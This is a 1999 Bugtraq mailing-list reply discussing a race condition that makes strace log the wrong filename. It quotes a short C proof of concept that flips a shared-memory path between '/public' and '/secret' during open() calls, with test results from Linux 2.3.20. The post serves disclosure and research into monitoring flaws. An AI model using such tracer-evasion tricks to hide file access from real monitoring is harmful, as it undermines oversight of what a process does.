[13116] in bugtraq
Re: strace can lie
daemon@ATHENA.MIT.EDU (Sampo Savolainen)
Tue Dec 28 10:44:06 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.3.96.991228125947.10293C-100000@cristobal>
Date: Tue, 28 Dec 1999 13:24:45 +0200
Reply-To: Sampo Savolainen <v2@moontv.fi>
From: Sampo Savolainen <v2@MOONTV.FI>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <19991225230452.C114@bug.ucw.cz>
On Sat, 25 Dec 1999, Pavel Machek wrote:
> void
> main(void)
> {
> char *c = 0x94000000;
> open( "/tmp/delme", O_RDWR );
> mmap( c, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED, 3, 0);
> *c = 0;
> if (fork()) {
> while(1) {
> strcpy( c, "/public" );
> strcpy( c, "/secret" );
> }
> } else
> while (1)
> open( c, 0 );
> }
> [pid 224] open("/public", O_RDONLY) = 718
> [pid 224] open("/secret", O_RDONLY) = 719
> [pid 224] open("/public", O_RDONLY) = 720
I tried this with Linux 2.3.20, it worked fine:
cristobal:~# ls -l /secret /public
-rw-rw-r-- 1 root root 7 Dec 28 13:17 /public
--w--w---- 1 root root 7 Dec 28 13:17 /secret
and the strace log:
[pid 10999] open("/public", O_RDONLY) = 192
[pid 10999] open("/secret", O_RDONLY) = -1 EACCES (Permission denied)
..most of the time.
from 1270 tried opens, 11 tries had the wrong filename read from memory.
Does the kernel save the filename anywhere in the filedescriptor arrays?
If it does, then strace could be easily modified to read the filename from
the kernel, not from the programs userspace.
------------------------------------------------------------------------------
v2 - Sampo Savolainen - 040 7555649 Saraxa Media / Finngemma Tuotanto Oy
